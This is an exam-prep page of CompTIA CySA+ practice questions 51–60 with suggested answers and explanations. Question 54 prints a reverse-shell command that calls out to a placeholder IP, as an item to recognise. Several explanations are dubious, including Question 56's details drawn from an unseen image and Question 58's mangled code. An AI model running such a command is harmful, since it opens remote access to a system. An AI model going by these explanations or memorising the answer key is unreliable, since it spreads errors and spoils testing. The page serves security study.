ExamGecko
Home / CompTIA / CS0-003 / List of questions
Ask Question

CompTIA CS0-003 Practice Test - Questions Answers, Page 6

Add to Whishlist

List of questions

Question 51

Report Export Collapse

A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?

SLA
SLA
MOU
MOU
NDA
NDA
Limitation of liability
Limitation of liability
Suggested answer: A
Explanation:

SLA stands for service level agreement, which is a contract or document that defines the expectations and obligations between a service provider and a customer regarding the quality, availability, performance, or scope of a service. An SLA may also specify the metrics, penalties, or remedies for measuring or ensuring compliance with the agreed service levels. An SLA can help the SOC manager review if the team is meeting the appropriate contractual obligations for the customer, such as response time, resolution time, reporting frequency, or communication channels.

asked 02/10/2024
James DePhillip
50 questions

Question 52

Report Export Collapse

Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?

Command and control
Command and control
Actions on objectives
Actions on objectives
Exploitation
Exploitation
Delivery
Delivery
Suggested answer: A
Explanation:

Command and control (C2) is a phase of the Cyber Kill Chain that involves the adversary attempting to establish communication with a successfully exploited target. C2 enables the adversary to remotely control or manipulate the target system or network using various methods, such as malware callbacks, backdoors, botnets, or covert channels. C2 allows the adversary to maintain persistence, exfiltrate data, execute commands, deliver payloads, or spread to other systems or networks.

asked 02/10/2024
Earl Frederick
40 questions

Question 53

Report Export Collapse

A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?

External
External
Agent-based
Agent-based
Non-credentialed
Non-credentialed
Credentialed
Credentialed
Suggested answer: B
Explanation:

Agent-based vulnerability scanning is a method that involves installing software agents on the target systems or networks that can perform local scans and report the results to a central server or console. Agent-based vulnerability scanning can reduce network traffic, as the scans are performed locally and only the results are transmitted over the network. Agent-based vulnerability scanning can also provide more accurate and up-to-date results, as the agents can scan continuously or on-demand, regardless of the system or network status or location.

asked 02/10/2024
Princess Sophia Tuazon
45 questions

Question 54

Report Export Collapse

A security analyst detects an exploit attempt containing the following command:

sh -i >& /dev/udp/10.1.1.1/4821 0>$l

Which of the following is being attempted?

RCE
RCE
Reverse shell
Reverse shell
XSS
XSS
SQL injection
SQL injection
Suggested answer: B
Explanation:

A reverse shell is a type of shell access that allows a remote user to execute commands on a target system or network by reversing the normal direction of communication. A reverse shell is usually created by running a malicious script or program on the target system that connects back to the remote user's system and opens a shell session. A reverse shell can bypass firewalls or other security controls that block incoming connections, as it uses an outgoing connection initiated by the target system. In this case, the security analyst has detected an exploit attempt containing the following command:

sh -i >& /dev/udp/10.1.1.1/4821 0>$l

This command is a shell script that creates a reverse shell connection from the target system to the remote user's system at IP address 10.1.1.1 and port 4821 using UDP protocol.

asked 02/10/2024
Chad Clark
50 questions

Question 55

Report Export Collapse

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?

Scope
Scope
Weaponization
Weaponization
CVSS
CVSS
Asset value
Asset value
Suggested answer: B
Explanation:

Weaponization is a factor that describes how an adversary develops or acquires an exploit or payload that can take advantage of a vulnerability and deliver a malicious effect. Weaponization can increase the severity or impact of a vulnerability, as it makes it easier or more likely for an attacker to exploit it successfully and cause damage or harm. Weaponization can also indicate the level of sophistication or motivation of an attacker, as well as the availability or popularity of an exploit or payload in the cyber threat landscape. In this case, an older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. This indicates that weaponization was the reason for this escalation.

asked 02/10/2024
Farshin Golpad
41 questions

Question 56

Report Export Collapse

An analyst is reviewing a vulnerability report for a server environment with the following entries:

CompTIA CS0-003 image Question 56 94677 10022024175105000000

Which of the following systems should be prioritized for patching first?

10.101.27.98
10.101.27.98
54.73.225.17
54.73.225.17
54.74.110.26
54.74.110.26
54.74.110.228
54.74.110.228
Suggested answer: D
Explanation:

The system that should be prioritized for patching first is 54.74.110.228, as it has the highest number and severity of vulnerabilities among the four systems listed in the vulnerability report. According to the report, this system has 12 vulnerabilities, with 8 critical, 3 high, and 1 medium severity ratings. The critical vulnerabilities include CVE-2019-0708 (BlueKeep), CVE-2019-1182 (DejaBlue), CVE-2017-0144 (EternalBlue), and CVE-2017-0145 (EternalRomance), which are all remote code execution vulnerabilities that can allow an attacker to compromise the system without any user interaction or authentication. These vulnerabilities pose a high risk to the system and should be patched as soon as possible.

asked 02/10/2024
Eduardo Messias Andrade e Oliveira
38 questions

Question 57

Report Export Collapse

A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?


Credentialed network scanning
Credentialed network scanning
Passive scanning
Passive scanning
Agent-based scanning
Agent-based scanning
Dynamic scanning
Dynamic scanning
Suggested answer: C
Explanation:

Agent-based scanning is a method that involves installing software agents on the target systems or networks that can perform local scans and report the results to a central server or console. Agent-based scanning can reduce the access to systems, as the agents do not require any credentials or permissions to scan the local system or network. Agent-based scanning can also provide the most accurate vulnerability scan results, as the agents can scan continuously or on-demand, regardless of the system or network status or location.

asked 02/10/2024
Stefan Duerr
43 questions

Question 58

Report Export Collapse

A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?

function x() { info=$(geoiplookup $1) && echo '$1 | $info' }
function x() { info=$(geoiplookup $1) && echo '$1 | $info' }
function x() { info=$(ping -c 1 $1 | awk -F '/' 'END{print $5}') && echo '$1 | $info' }
function x() { info=$(ping -c 1 $1 | awk -F '/' 'END{print $5}') && echo '$1 | $info' }
function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F '.in-addr' '{print $1} ').origin.asn.cymru.com TXT +short) && echo '$1 | $info' }
function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F '.in-addr' '{print $1} ').origin.asn.cymru.com TXT +short) && echo '$1 | $info' }
function x() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo '$1 | $info' }
function x() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo '$1 | $info' }
Suggested answer: C
Explanation:

The function that can be used on a shell script to identify anomalies on the network routing most accurately is:

function x() { info=(dig(dig -x $1 | grep PTR | tail -n 1 | awk -F ''.in-addr'' '{print $1} ').origin.asn.cymru.com TXT +short) && echo ''$1 | $info'' }

This function takes an IP address as an argument and performs two DNS lookups using the dig command. The first lookup uses the -x option to perform a reverse DNS lookup and get the hostname associated with the IP address. The second lookup uses the origin.asn.cymru.com domain to get the autonomous system number (ASN) and other information related to the IP address. The function then prints the IP address and the ASN information, which can help identify any routing anomalies or inconsistencies

asked 02/10/2024
Federico Miliacca
41 questions

Question 59

Report Export Collapse

There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?

Implement step-up authentication for administrators
Implement step-up authentication for administrators
Improve employee training and awareness
Improve employee training and awareness
Increase password complexity standards
Increase password complexity standards
Deploy mobile device management
Deploy mobile device management
Suggested answer: B
Explanation:

The best security control to implement against sensitive information being disclosed via file sharing services is to improve employee training and awareness. Employee training and awareness can help educate employees on the risks and consequences of using file sharing services for sensitive information, as well as the policies and procedures for handling such information securely and appropriately. Employee training and awareness can also help foster a security culture and encourage employees to report any incidents or violations of information security.

asked 02/10/2024
Aldrin Plata
45 questions

Question 60

Report Export Collapse

Which of the following is the best way to begin preparation for a report titled 'What We Learned' regarding a recent incident involving a cybersecurity breach?

Determine the sophistication of the audience that the report is meant for
Determine the sophistication of the audience that the report is meant for
Include references and sources of information on the first page
Include references and sources of information on the first page
Include a table of contents outlining the entire report
Include a table of contents outlining the entire report
Decide on the color scheme that will effectively communicate the metrics
Decide on the color scheme that will effectively communicate the metrics
Suggested answer: A
Explanation:

The best way to begin preparation for a report titled ''What We Learned'' regarding a recent incident involving a cybersecurity breach is to determine the sophistication of the audience that the report is meant for. The sophistication of the audience refers to their level of technical knowledge, understanding, or interest in cybersecurity topics. Determining the sophistication of the audience can help tailor the report content, language, tone, and format to suit their needs and expectations. For example, a report for executive management may be more concise, high-level, and business-oriented than a report for technical staff or peers.

asked 02/10/2024
giulio guzzi
47 questions
Total 431 questions
Go to page: of 44
Search

Related questions